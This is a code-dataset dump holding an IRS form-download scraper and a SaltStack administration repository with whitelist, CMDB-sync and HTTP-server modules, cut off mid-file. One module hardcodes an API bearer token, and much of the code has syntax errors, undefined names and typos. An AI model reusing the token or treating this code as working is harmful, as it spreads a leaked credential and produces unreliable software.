"text": "Thanks for the opportunity to complete your challenge! I have completed this using python 3.9.\nOnce you run the script in the terminal, \nan input box will appear. This will take the form_number you are searching for and this has to be an\nexact match. ex(Form W-2) Once you enter in an exact match, the the source URL will dynamically update for the \nrequested results and returned as JSON in the terminal. After reviewing the results, simply enter y \nto continue to download any files. The program will promt you for a parameter of years. Start by entering \nthe lowest year(enter) then the highest year(enter) you would like to download. After the download is \ncomplete. Simply re-run the script to explore/download any other files. \n\n\n\nbeautifulsoup4 will be required to run this program along with request and lxml.\n\n\nExited to hear any feedback!"
},
{
"alpha_fraction": 0.5511934757232666,
"alphanum_fraction": 0.5574748516082764,
"avg_line_length": 36.71428680419922,
"blob_id": "b05719589af34d7ab783053e44dc1f4178ae3fbd",
"content_id": "69aea93e5eae6b792499a35ee359bf5fbc04f5ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3184,
"license_type": "no_license",
"max_line_length": 217,
"num_lines": 84,
"path": "/pinwheel.py",
"repo_name": "loganrobinson315/web-scraper",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\nimport requests\nfrom datetime import date\nimport itertools\nimport json \n\n\ndef gather_info():\n search_term = val.replace(\" \", \"+\")\n print(search_term)\n source = requests.get(f'https://apps.irs.gov/app/picklist/list/priorFormPublication.html?resultsPerPage=200&sortColumn=sortOrder&indexOfFirstRow=0&criteria=formNumber&value={search_term}&isDescending=false',).text\n soup = BeautifulSoup(source, 'lxml')\n # file_number = soup.find_all('th', {'class':'ShowByColumn'})\n for table in soup.find_all('tr', {'class':['even','odd']}):\n if table.td(text={val}):\n form_number = table.td.text\n form_title = table.find('td', class_='MiddleCellSpacer').text\n \n for table in soup.find_all('tr', {'class':['even','odd']}):\n if table.td(text={val}):\n output = []\n min_years = table.find('td', class_='EndCellSpacer').text.split()\n my_min_year = 9999\n my_max_year = 0000\n for i in min_years:\n my_year = int(i)\n if my_year < my_min_year:\n my_min_year = my_year \n \n for table in soup.find_all('tr', {'class':['even','odd']}):\n if table.td(text={val}):\n output = []\n min_years = table.find('td', class_='EndCellSpacer').text.split()\n for i in min_years:\n my_year = int(i)\n if my_year > my_max_year:\n my_max_year = my_year\n x = {\n \"form_number\": form_number.strip(),\n \"form_title\": form_title.strip(),\n \"min_year\": my_min_year,\n \"max_year\": my_max_year,\n }\n \n\n y = json.dumps(x)\n\n print('Here is the info for', val)\n print()\n print(y)\n print()\n\n \ndef download():\n search_term = val.replace(\" \", \"+\")\n # print(search_term)\n source = requests.get(f'https://apps.irs.gov/app/picklist/list/priorFormPublication.html?resultsPerPage=200&sortColumn=sortOrder&indexOfFirstRow=0&criteria=formNumber&value={search_term}&isDescending=false',).text\n soup = BeautifulSoup(source, 'lxml')\n links = soup.find_all('a')\n i = 0\n if answer == \"y\": \n for link in links:\n for year_number in range(start_number, end_number+1):\n if link(text={val}):\n if ('.pdf' and str(year_number) in link.get('href', [])):\n i += 1\n print(\"Downloading file: \", i)\n response = requests.get(link.get('href'))\n pdf = open(val+\"-\"+str(year_number)+\".pdf\", 'wb')\n pdf.write(response.content)\n pdf.close()\n print(\"File \", i, \" downloaded\")\n print('downloaded')\n else:\n print('does not exist')\n\n \nprint('Welcome!')\nval = input(\"Please enter a Form Value (This needs to bee an exact match): \")\ngather_info()\nanswer = input(\"Lets download the files, enter y to continue:\")\nstart_number = int(input(\"Please enter a START year you would like to download: \"))\nend_number = int(input(\"Please enter an END year you would like to download: \"))\ndownload()\n \n\n\n\n\n\n\n\n\n\n\n\n"
}
] | 2 |
ketwang/saltstack | https://github.com/ketwang/saltstack | cd35dff96cb36372fd3a285c67c0f20f0d445259 | 8b5f0d8068f3f7c8c0a2ea3cc476bad96e699565 | 869c42c7035daaa88e0b91c90456f8810fbf146a | refs/heads/master | 2016-08-10T11:29:04.167351 | 2016-02-26T09:15:14 | 2016-02-26T09:15:14 | 50,557,364 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7053139805793762,
"alphanum_fraction": 0.7053139805793762,
"avg_line_length": 24.875,
"blob_id": "ffd2d49471a3b8e878c78b0e807b28ec853dd861",
"content_id": "9898e475f6424fd7c84bb0c0705a84ebb50aa2e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 207,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 8,
"path": "/salttask/getModules.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "import xml.dom.minidom\nclass service(object):\n\tdef __init__(self):\n\t\tself.filePath = 'config_d/services.xml'\n\tdef getServiceXmlFile(self):\n\t\twith open(self.filePath) as fd:\n\t\t\tdata = fd.read()\n\t\treturn data\n"
},
{
"alpha_fraction": 0.5595126748085022,
"alphanum_fraction": 0.5682598948478699,
"avg_line_length": 34.56666564941406,
"blob_id": "2665731081a53ad8fa187aee80c8b398c1f6bead",
"content_id": "62cc0b922add7c47661b1fefd522cfd9c14df89f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3255,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 90,
"path": "/util/getWhiteList.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "import xml.dom.minidom\n\"\"\"这里要实现白名单的维护与删除\n这里后续考虑用数据库来记录\n\"\"\"\nimport redis\n\nredisconfig = {'host': 'salt-master-test.idcvdian.com'\n 'port': 6379,\n 'db': 0\n\t}\n\nclass handleWhiteListRedis(obejct):\n\tdef __init__(self):\n\t\tself.host = redisconfig['host']\n self.port = redisconfig['port']\n self.db = redisconfig['db']\n def __enter__(self):\n \tconn = redis.Redis(host=self.host, port=self.port, db=self.db)\n \treturn conn\n def __exit(self, p1, p2, p3):\n \tconn.close()\n\nclass handleWhiteListXmlFile(object):\n def __init__(self):\n self.path = 'config.d/whiteList.xml'\n self.xmlDocument = xml.dom.minidom.parse(self.path)\n self.root = self.xmlDocument.documentElement\n print dir(self.xmlDocument)\n def getWhiteIPList(self):\n record={}\n #xmlDocument = xml.dom.minidom.parse(self.path)\n #root = xmlDocument.documentElement\n for item in self.root.childNodes:\n if item.nodeName == 'host':\n _ = item.getElementsByTagName('ip')[0], item.getElementsByTagName('reason')[0]\n #print _\n record[_[0].childNodes[0].data] = _[1].childNodes[0].data\n elif item.nodeName == 'hostSet':\n _ = item.getElementsByTagName('ipSet')[0], item.getElementsByTagName('reason')[0]\n #print _\n record[_[0].childNodes[0].data] = _[1].childNodes[0].data\n return record\n def deleteIP(self, type_, value):\n if type_ == 'host':\n key_word = 'ip'\n else:\n key_word = 'ipSet'\n for item in self.root.getElementsByTagName(type_):\n if value == item.getElementsByTagName(key_word)[0].childNodes[0].data:\n self.xmlDocument.removeChild(item)\n break\n with open(self.path, 'w+') as fd:\n self.xmlDocument.writexml(fd, addindent=' ', newl='', encoding='utf-8')\n\n def appendIP(self, type_, key, value):\n if type_ == 'host':\n tp = self.xmlDocument.createElement(type_)\n\n k = self.xmlDocument.createElement('ip')\n k.appendChild(self.xmlDocument.createTextNode(key))\n else:\n tp = self.xmlDocument.createElement(type_)\n\n k = self.xmlDocument.createElement('ip')\n k.appendChild(self.xmlDocument.createTextNode(key))\n\n\n v = self.xmlDocument.createElement('reason')\n v.appendChild(self.xmlDocument.createTextNode(value))\n \n tp.appendChild(k)\n tp.appendChild(v)\n self.root.appendChild(tp)\n with open(self.path, 'w+') as fd:\n self.xmlDocument.writexml(fd, addindent=' ', newl='\\n', encoding='utf-8')\n\n\nclass whitelist(object):\n\tdef __init__(self):\n\t\tself.filePath = 'config.d/whiteList.xml'\n\tdef getWhiteListXmlFile(self):\n\t\twith open(self.filePath) as fd:\n\t\t\tdata = fd.read()\n\t\treturn data\n\n\nif __name__ == '__main__':\n #record = handleWhiteListXmlFile().getWhiteIPList()\n #print record\n handleWhiteListXmlFile().appendIP('host', '1.1.1.1', 'test')\n"
},
{
"alpha_fraction": 0.5730336904525757,
"alphanum_fraction": 0.6292135119438171,
"avg_line_length": 16.799999237060547,
"blob_id": "bddc0dda6e16806e40b97f1c56947128c64331e7",
"content_id": "64e64f5a3ff0997e548f570367e2e2d877d81149",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 89,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 5,
"path": "/util/config.d/redis.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "redis_whiteIPList = {\n'host': 'salt-master-test.idcvdian.com',\n'port': '6397',\n'db': 0\n}\n"
},
{
"alpha_fraction": 0.6703417897224426,
"alphanum_fraction": 0.6849504113197327,
"avg_line_length": 36.020408630371094,
"blob_id": "fcb234e279fefa6523f9182ae697a0a156496027",
"content_id": "e078cf6595ad52001adfaef39cb1decc23a92e8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3918,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 98,
"path": "/util/synCMDB.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\n在CMDB中删除一台机器时,要在salt master中删除对应虚拟机的key\n这里需要在彻底删除虚拟机时,我们接口会得到消息提示\n\n对于物理机重装,则需要我们手动删除对应的KEY值\n\n下面两个函数可用于统计saltmaster上各个keys的情况(接受的、拒绝的等)\n也可以用于比对saltmaster管辖的机器和CMDB中记录的机器进行对比\n\"\"\"\n\n#http://api.o.vdian.net/servers?ip=10.1\" -H\"Authorization:Bearer 2QJvkuntJAtkHkABF0nawvUdEUM31s9f\" -H'Content-Type:application/json\n\n#curl \"http://api.o.vdian.net/servers?ip_fuzzy=10.1&page=false\" -H\"Authorization:Bearer 2QJvkuntJAtkHkABF0nawvUdEUM31s9f\" -H'Content-Type:application/json'\n#http://api.o.vdian.net/servers?ip=10.1&page=false\nimport socket\nimport urllib\nimport httplib\nimport subprocess\nimport re\nimport json\n\nclass minionIDNotExistsEXception(Exception):\n \"\"\"\n minion id不存在时引发此异常\n \"\"\"\n pass\n\n\ndef getIPListFromCMDB():\n #params = urllib.urlencode({'ip_fuzzy':'10.1.', 'page':'false'})\n headers = {'Content-Type':'application/json', 'Authorization': 'Bearer 2QJvkuntJAtkHkABF0nawvUdEUM31s9f'}\n conn = httplib.HTTPConnection('api.*.*.net')\n conn.request('GET', '/servers?ip_fuzzy=10.1&page=false',headers=headers)\n #conn.putheader('Authorization','2QJvkuntJAtkHkABF0nawvUdEUM31s9f')\n #conn.putheader('Content-Type','application/json')\n #conn.endheaders()\n response = conn.getresponse()\n data = response.read()\n conn.close()\n reg = re.compile(r'10\\.1(?:\\.[0-9]+){2}')\n iplist = reg.findall(data)\n return iplist\n\n\ndef getIPListFromSaltMaster():\n #salt-key -L | awk '/Accepted Keys:/,/Denied Keys/{if(i>1)print x;x=$0;i++}'\n #Denied Keys:\n #Unaccepted Keys:\n #Rejected Keys:\n iplist = {} \n accepted_keys = \"salt-key -L | awk '/Accepted Keys:/,/Denied Keys/{if(i>1)print x;x=$0;i++}'\"\n denied_keys = \"salt-key -L | awk '/Denied Keys/,/Unaccepted Keys/{if(i>1)print x;x=$0;i++}'\"\n unaccepted_keys = \"salt-key -L | awk '/Unaccepted Keys/,/Rejected Keys/{if(i>1)print x;x=$0;i++}'\"\n rejected_keys = \"salt-key -L | sed -n '/Rejected Keys/,$p' | sed -n '2,$p'\"\n iplist['accepted_keys']= subprocess.Popen(accepted_keys, stdout=subprocess.PIPE, shell=True).stdout.read().split()\n iplist['denied_keys']= subprocess.Popen(denied_keys, stdout=subprocess.PIPE, shell=True).stdout.read().split()\n iplist['unaccepted_keys']= subprocess.Popen(unaccepted_keys, stdout=subprocess.PIPE, shell=True).stdout.read().split()\n iplist['rejected_keys']= subprocess.Popen(rejected_keys, stdout=subprocess.PIPE, shell=True).stdout.read().split()\n return iplist\n\ndef deleteMinionKey(ipList):\n \"\"\"顶多一次删除二十条数据\n \"\"\"\n failedIPList = []\n if len(ipList) > 20:\n failedIPList = ipList\n return failedIPList\n for minionKey in ipList:\n try:\n path = os.path.join('/etc/salt/pki/master/minions', minionKey)\n if os.path.exists(path): \n os.unlink(path)\n except OSError:\n failedIPLsit.append(minionKey)\n return failedIPList\n\n\ndef dataReturnToWebPage():\n minionInSalt = getIPListFromSaltMaster()\n minionInCMDB = getIPListFromCMDB()\n ipList = []\n for ip in minionInSalt['accepted_keys']:\n if ip not in minionInCMDB:\n ipList.append(ip)\n minionInSaltNotInCMDB = deleteMinionKey(ipList)\n for ip in ipLsit:\n minionInSalt['accepted_keys'].remove(ip)\n minionNotUnderControl = []\n for ip in minionInCMDB:\n if ip not in minionInSalt['accepted_keys']:\n minionNotUnderControl.append(ip)\n minionInSalt['minionNotUnderControl'] = minionNotUnderControl\n minionInSalt['minionInSaltNotInCMDB'] = minionInSaltNotInCMDB\n \"\"\"稍后改为json格式数据\n \"\"\"\n minionInSalt = json.dumps(minionInSalt)\n return minionInSalt\n"
},
{
"alpha_fraction": 0.780339777469635,
"alphanum_fraction": 0.7851941585540771,
"avg_line_length": 21.88888931274414,
"blob_id": "fce0a561f9af9197cdc0c828a794bb80ae31c53e",
"content_id": "fdf4f426cfb10df20bbbbd829252e191f29316ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1588,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 36,
"path": "/salttask/config_d/setting.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\n\n\n这里属于配置文件,配置所有在saltmaster中定义的服务。\n配置文件在本模块加载时,载入到内存中,用于前端页面请求已经定义的推送服务类型。\n前端页面将所有的服务以下拉框的形式呈现,用户可以选择app类型。\n我们以ssh服务为例:\n当某台机器登录需要密码时,一般都是ssh没有推送分成功,这样我们可以在前段页面上选中ssh,\ntarget为指定的服务器IP地址\n点击页面上的执行button\n后端接收到指令后执行该命令,配置好机器的无密码登录\n对配置文件的修改暂不提供接口\n\"\"\"\nself_defined_app = {\n\t'yum': '配置服务器的yum源',\n\t'ssh': '配置ssh无密码登录,主要是WWW、ROOT用户的无密码登录',\n\t'hosts': '主机名配置服务'\n}\n\n\"\"\"\n这里存放所有自定义的module,标准的module可以在下列url查询:\n http://docs.saltstack.com/ref/modules/all/\n 这里也是前端提供下拉框选项,显示自定义模块,由于minion具有\n root权限所以我们在前端不开放高危险性的module,防止手滑。\n 这里我们假设self_defined_app和self_defined_modules定义的所有的服务已经可以满足我们的需求\n 并且我们可以手动在saltmaster上添加\n \n\n Jid: job id, 格式为%Y%m%d%H%M%S%f\n\"\"\"\nself_defined_modules = {\n\t#以module name作为key,module中定义的方法列表作为value\n\t#这里的module要放在_module目录下面,并且要向目的主机推送,这块暂时手动推送\n\t#\"getServerInfo\": ['func1', 'func2', 'func3']\n}\n"
},
{
"alpha_fraction": 0.6519566774368286,
"alphanum_fraction": 0.6527893543243408,
"avg_line_length": 25.795454025268555,
"blob_id": "c36bcceda566e7b4791e2dd7d762b1b1bdf0291f",
"content_id": "f22e7007ab03bee2ffb73442ca1320d25876083a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1257,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 44,
"path": "/salttask/app.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom salt import saltTask\nfrom salttask.config_d.setting import self_defined_app\nfrom salttask.config_d.setting import self_defined_modules\n\n\n\nclass saltSelfDefinedApp(object):\n\t\"\"\"\n\t一般是用来从master向minion推送某些文件\n\t\"\"\"\n\tdef __init__(appName, target):\n\t\tif appName not in self_defined_app:\n\t\t\traise ValueError, '%s does not exists' %(appName,)\n\t\tself.appName = appName\n\t\tself.target = target\n\t\tself.sync()\n def sync(self):\n \t task = salt.saltTask(self.target, 'state.sls', 'os.'+self.appName)\n \t task.start()\n \t task.wait()\n\n\n\nclass slatSelfDefinedModule(object):\n\t\"\"\"\n\t一般是用来单纯在minion上执行某些命令\n\t\"\"\"\n\tdef __init__(self, module, function,target):\n\t\tif module in self_defined_modules:\n\t\t\tif function in self_defined_modules[module]:\n\t\t\t\tself.module = module\n\t\t\t\tself.function = function\n\t\t\telse:\n\t\t\t\traise ValueError, 'module (%s) does not have function (%s)' %(self.module, self.function)\n else:\n \t raise ValueError, 'module (%s) does not exists' %(self.module,)\n\t\tself.target = target\n\t\tself.sync()\n\n\tdef sync(self): \n\t\ttask = salt.saltTask(self.target, self.module+'.'+self.function)\n\t\ttask.start()\n\t\ttask.wait()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\t\t\n\t\t\n"
},
{
"alpha_fraction": 0.5866167545318604,
"alphanum_fraction": 0.5981764793395996,
"avg_line_length": 36.45121765136719,
"blob_id": "327321b81cf4196f423e75112b7c5afa5527199f",
"content_id": "ae609cde5962e76186b8be4493fff923aea875f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6668,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 164,
"path": "/httpserver/httpServerArch.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*- \nfrom SocketServer import ForkingMixIn\nfrom BaseHTTPServer import BaseHTTPRequestHandler\nfrom BaseHTTPServer import HTTPServer\nimport json\nimport urllib\nimport logging\n\n\n\n\"\"\"\n这里多个进程会使用logger对象向同一个文件里面写入\n但是如果一次文件写入的数据量小于4096字节应该是一种原子操作,所以这里多个进程应该会安全的写入同一个文件\n我们也可以使用sockethandler,使用tcp为我们聚合日志,然后集中向文件写入,这样也就不会出现冲突等问题\n\"\"\"\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\nfd = logging.FileHandler('mysalt.log')\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nfd.setFormatter(formatter)\nlogger.addHandler(fd)\n\n\"\"\"\n这里ModifiedBaseHTTPRequestHandler继承了BaseHTTPRequestHandler并且做了一点小的修改。\n原来的BseHTTPRequestHandler.parse_request()方法没有解析POST方法下的content。\n这里我们改写了这个方法,添加了一小段代码。\n self.command == 'post' and self.headers.get('content-length', None) and self.headers.get('content-type', None)\n 为真。\n 则按照content-length所指定的字节大小从tcp套接字缓冲区内读取相应字节的数据\n 并且按照content-type指定的数据格式来解析相应的数据 \n\"\"\"\n\nclass ModifiedBaseHTTPRequestHandler(BaseHTTPRequestHandler):\n global logger\n def log_warning(self, string):\n logger.warning(string) \n def log_message(self, format, *args):\n \"\"\"Log an arbitrary message.\n\n This is used by all other logging functions. Override\n it if you have specific logging wishes.\n\n The first argument, FORMAT, is a format string for the\n message to be logged. If the format string contains\n any % escapes requiring parameters, they should be\n specified as subsequent arguments (it's just like\n printf!).\n\n The client ip address and current date/time are prefixed to every\n message.\n\n \"\"\"\n logger.info('client %s - - %s %s\\n' %(self.client_address[0], format % args, str(self.body)))\n #sys.stderr.write(\"%s - - [%s] %s\\n\" %\n # (self.client_address[0],\n # self.log_date_time_string(),\n # format%args))\n def parse_request(self):\n \"\"\"Parse a request (internal).\n\n The request should be stored in self.raw_requestline; the results\n are in self.command, self.path, self.request_version and\n self.headers.\n\n Return True for success, False for failure; on failure, an\n error is sent back.\n\n \"\"\"\n self.command = None # set in case of error on the first line\n self.request_version = version = self.default_request_version\n self.close_connection = 1\n requestline = self.raw_requestline\n requestline = requestline.rstrip('\\r\\n')\n self.requestline = requestline\n words = requestline.split()\n if len(words) == 3:\n command, path, version = words\n if version[:5] != 'HTTP/':\n self.send_error(400, \"Bad request version (%r)\" % version)\n return False\n try:\n base_version_number = version.split('/', 1)[1]\n version_number = base_version_number.split(\".\")\n # RFC 2145 section 3.1 says there can be only one \".\" and\n # - major and minor numbers MUST be treated as\n # separate integers;\n # - HTTP/2.4 is a lower version than HTTP/2.13, which in\n # turn is lower than HTTP/12.3;\n # - Leading zeros MUST be ignored by recipients.\n if len(version_number) != 2:\n raise ValueError\n version_number = int(version_number[0]), int(version_number[1])\n except (ValueError, IndexError):\n self.send_error(400, \"Bad request version (%r)\" % version)\n return False\n except (ValueError, IndexError):\n self.send_error(400, \"Bad request version (%r)\" % version)\n return False\n if version_number >= (1, 1) and self.protocol_version >= \"HTTP/1.1\":\n self.close_connection = 0\n if version_number >= (2, 0):\n self.send_error(505,\n \"Invalid HTTP Version (%s)\" % base_version_number)\n return False\n elif len(words) == 2:\n command, path = words\n self.close_connection = 1\n if command != 'GET':\n self.send_error(400,\n \"Bad HTTP/0.9 request type (%r)\" % command)\n return False\n elif not words:\n return False\n else:\n self.send_error(400, \"Bad request syntax (%r)\" % requestline)\n return False\n self.command, self.path, self.request_version = command, path, version\n\n # Examine the headers and look for a Connection directive\n self.headers = self.MessageClass(self.rfile, 0)\n\n\n #we add some code here to get the post data if exists\n if self.command.lower() == 'post':\n content_length = int(self.headers.get('content-length', 'None'))\n content_type = self.headers.get('content-type', 'None')\n if content_length and content_type:\n self.body = self.rfile.read(content_length)\n if 'urlencoded' in content_type:\n self.body = urllib.unquote(self.body)\n elif 'json' is content_type:\n self.body = json.loads(self.body)\n else:\n self.body = None\n\n \n #content_length = self.headers.get('content-length', 'None')\n #print 'content-lenght: ', content_length\n conntype = self.headers.get('Connection', \"\")\n if conntype.lower() == 'close':\n self.close_connection = 1\n elif (conntype.lower() == 'keep-alive' and\n self.protocol_version >= \"HTTP/1.1\"):\n self.close_connection = 0\n return True\n\n \n\nclass ModifiedForkingMixin(ForkingMixIn):\n \"\"\"ForkingMixIn默认并发数最大为40\n 这里ModifiedMixFin继承ForkingMixIn,但是将并发数变为100或者其他自定义数值\n 这里暂未使用\n\n 方法搜寻原则:从左到右,广度优先\n \"\"\"\n max_children = 100\n\nclass HttpServerArch(ForkingMixIn, HTTPServer):\n pass\n\n\n\nclass HttpRequestHandlerArch(ModifiedBaseHTTPRequestHandler):\n pass\n"
},
{
"alpha_fraction": 0.6832695007324219,
"alphanum_fraction": 0.687100887298584,
"avg_line_length": 21.757282257080078,
"blob_id": "23a673e25c173aeff936ead727ce62e261a1d288",
"content_id": "97bd160b345245b83b7ee6ec5cf845b5511971c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2765,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 103,
"path": "/salttask/salt.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport os\n\n\n\ntry:\n\timport MySQLdb\nexcept ImportError:\n\t__hasMySQLdb__ = True\n__hasMySQLdb__ = False\n\n\n\n\"\"\"\n(1)未返回主机列表(原先的target list与所有返回的list--可能是成功或者失败,对比出未返回的)\n 未返回的结果,先检查主机存活与否,若存活,则再检查连接性,若连接着,二次执行\n 通过两个函数来判断\n(2)执行出错主机列表(直接通过success字段判断)\n(3)成功执行主机列表(直接通过success字段判断) \n---->总共有这三种情况\n\"\"\"\n\ndef checktarget(value):\n\t\"\"\"\n\t 用来解析target的合法性,这里算作一个命令执行的控制口\n\t 定义salt组等其他target模式\n\t 以后也可以扩展,生成target的可执行命令的配置白名单\n\t\"\"\"\n\treturn True\n\n\nclass target(object):\n\t\"\"\"\n\t这是一个descriptor,访问控制\n\t\"\"\"\n\tdef __get__(self, instance, owner):\n\t\tif hasattr(insatnce, '_target'):\n\t\t\tif not instance._target:\n\t\t\t\traise AttributeError, \"salttarget is None\"\n\t\t\treturn instance._target\n\t\traise AttributeError, \"salttarget is not set\"\n\tdef __set__(self, instance, value):\n\t\tif not checktarget(value):\n\t\t\tinstance._target = None\n\t\t raise AttributeError, 'salttarget is unvalid'\n\t\tinstance._target = value\n\t\t\n\n\n\nclass saltTask(object):\n\t\"\"\"\n\t定义一次salt的task\n\t\"\"\"\n\tsalttarget = target()\n\tdef __init__(self, salttarget, saltModuleFunction):\n\t\t#self.saltcommand = saltcommand\n\t\tself.salttarget = salttarget\n\t\tself.saltModuleFunction = saltModuleFunction\n\t\tself.fun_args = args\n\t\tself.fun_kargs = kargs\n\n\tdef start(self):\n\t\ttry:\n\t\t\tself.taskpid = os.fork()\n\t\t\tif pid == 0:\n\t\t\t\tos.execl('/usr/bin/salt', 'salt', self.salttarget, self.saltModuleFunction)\n\t\texcept OSError, e:\n\t\t\tself.ret = \"failed\"\n\n\tdef wait(self):\n\t\tif hasattr(self, 'ret'):\n\t\t\tself.storeTaskInfo(self.ret, self.jobid, self.target)\n\t\t\treturn \n\t\tpid , status = os.waitpid(self.taskpid, 0)\n\t\tself.ret = \"success\"\n\t\tself.storeTaskInfo(self.ret, self.jobid, self.target)\n\n\tdef storeTaskInfo(self,ret, jobid):\n\t\twith handlerDB(dbname, hostname, username, password) as db:\n\t\t\tdb.execute(\"insert into table_name values (%s, %s)\" %(ret, jobid))\n\t\treturn self.jobid\n\n\t\t\t\n\nclass handlerDB(object):\n\t\"\"\"\n\t实现数据库的操作\n\t\"\"\"\n\tdef __init__(self, dbname, hostname, username, password):\n\t\tif not __hasMySQLdb__:\n\t\t\traise ImportError, 'No MySQLdb module!'\n\t\tself.dbname = dbname\n\t\tself.hostname = hostname\n\t\tself.username = username\n\t\tself.password = password\n\tdef __enter__(self):\n\t\tconn = MySQLdb.connect(db=self.dbname, host=self.hostname, user=self.username, passwd=self.password)\n\t\tcur = conn.cursor()\n\t\treturn cur\n\tdef __exit__(self, para1, para2, para3):\n\t\tcur.close()\n\t\tconn.close()\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6908619403839111,
"alphanum_fraction": 0.691510021686554,
"avg_line_length": 23.492063522338867,
"blob_id": "d966d5a72e16cf023f2f5027162a6ae787dbbeed",
"content_id": "7cc789d1414eeba18bd2875b28f9e82038089d4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1555,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 63,
"path": "/mainLogServer.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport os\nimport socket\nimport logging\nimport threading\n\nunixDomainSocket = '/var/logUnixDomainSocket'\n\nlogserver = None\n\ndef createServerLog(logFilePath):\n\tglobal logserver\n\tif not logserver:\n\t\tlogserver = __serverLog(logFilePath)\n\treturn logserver\n\n\n\"\"\"\nlogging是线程安全的\n\"\"\"\n\n\n\nclass __serverLog(object):\n def __init__(self,logFilePath):\n\t\tself.logFilePath = logFilePath\n\t\tself.logger = logging.getLogger()\n def start(self):\n\t\twhile True:\n\t\t\tconn, addr = conn.accept()\n\n def createUnixSocket(self):\n \tif os.path.exists(unixDomainSocket):\n \t\ttry:\n \t\t\tos.unlink(logFilePath)\n \t\texcept OSError:\n \t\t\traise OSError, 'delete '+unixDomainSocket+ ' error!'\n \telse:\n \t\tself.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n \t\tself.sock.bind(unixDomainSocket)\n \t\tself.sock.listen()\n\n\n\n\nclass clientLog(object):\n\tdef __init__(obejct):\n\t\tif not logserver:\n\t\t\traise ValueError, 'log server does not exists!'\n\t\tself.logger = logging.getLoger()\n\t\tself.connectionToUnixDoaminServer()\n\tdef connectionToUnixDoaminServer(self):\n\t\tif logserver:\n\t\t\tself.cli = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n\t\t\tself.cli.connect(unixDomainSocket)\n\t\telse:\n\t\t\traise ValueError, 'log server does not exists!'\n\tdef loggerBindSocketfd(self):\n\t\tself.logger = logging.getLoger()\n\t\tself.logger.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n self.logger.setFormatter(formatter)\n self.logger.addHandler(fd)\n"
},
{
"alpha_fraction": 0.5782263875007629,
"alphanum_fraction": 0.5868781805038452,
"avg_line_length": 30.522727966308594,
"blob_id": "411641a1096e0316362309e30d8ad34ab016aa64",
"content_id": "52febd6da883a5a5c3d91203ce983c32465bccda",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3038,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 88,
"path": "/main.py",
"repo_name": "ketwang/saltstack",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*- \nimport os\nimport sys\nimport logging\npath = os.getcwd()\nsys.path.append(path) \nfrom httpserver.httpServerArch import HttpServerArch\nfrom httpserver.httpServerArch import HttpRequestHandlerArch\nfrom util.synCMDB import deleteMinionKey \nfrom util.synCMDB import dataReturnToWebPage\nfrom salttask.app import saltSelfDefinedApp\nfrom salttask.app import slatSelfDefinedModule\nimport httpserver\n\n\nclass myHttpRequestHandler(HttpRequestHandlerArch):\n def sendHeadersAndContent(self):\n\tself.send_response(200, 'ok')\n self.send_header('Connection', 'close')\n if self.body:\n self.send_header(\"Content-Type\", 'application/json')\n self.end_headers()\n if self.body:\n self.wfile.write(self.body)\n def do_GET(self):\n \tself.body = {}\n \tif self.path.startswith('/saltinfo'):\n \t\tself.body = dataReturnToWebPage()\n \t\"\"\"\n \tparams = self.path.split('?')[1].split('&')\n \tfor item in params:\n \t\ttmp = item.split('=')\n \t\tself.body[tmp[0]] = tmp[1]\n \t\"\"\"\n \tself.sendHeadersAndContent()\n \t\n\n \"\"\"\n to_do_list:\n 自定义salt job id\n 支持module function params\n \"\"\"\n def do_POST(self):\n if self.path.startswith('/totaldelete'):\n \"\"\"\n 这里post的content字段应该是一系列IP地址\n IP地址应该是空格或者回车分割\n 这里主要作用是,删除不必要的minion key,虚拟机可以自动删除\n 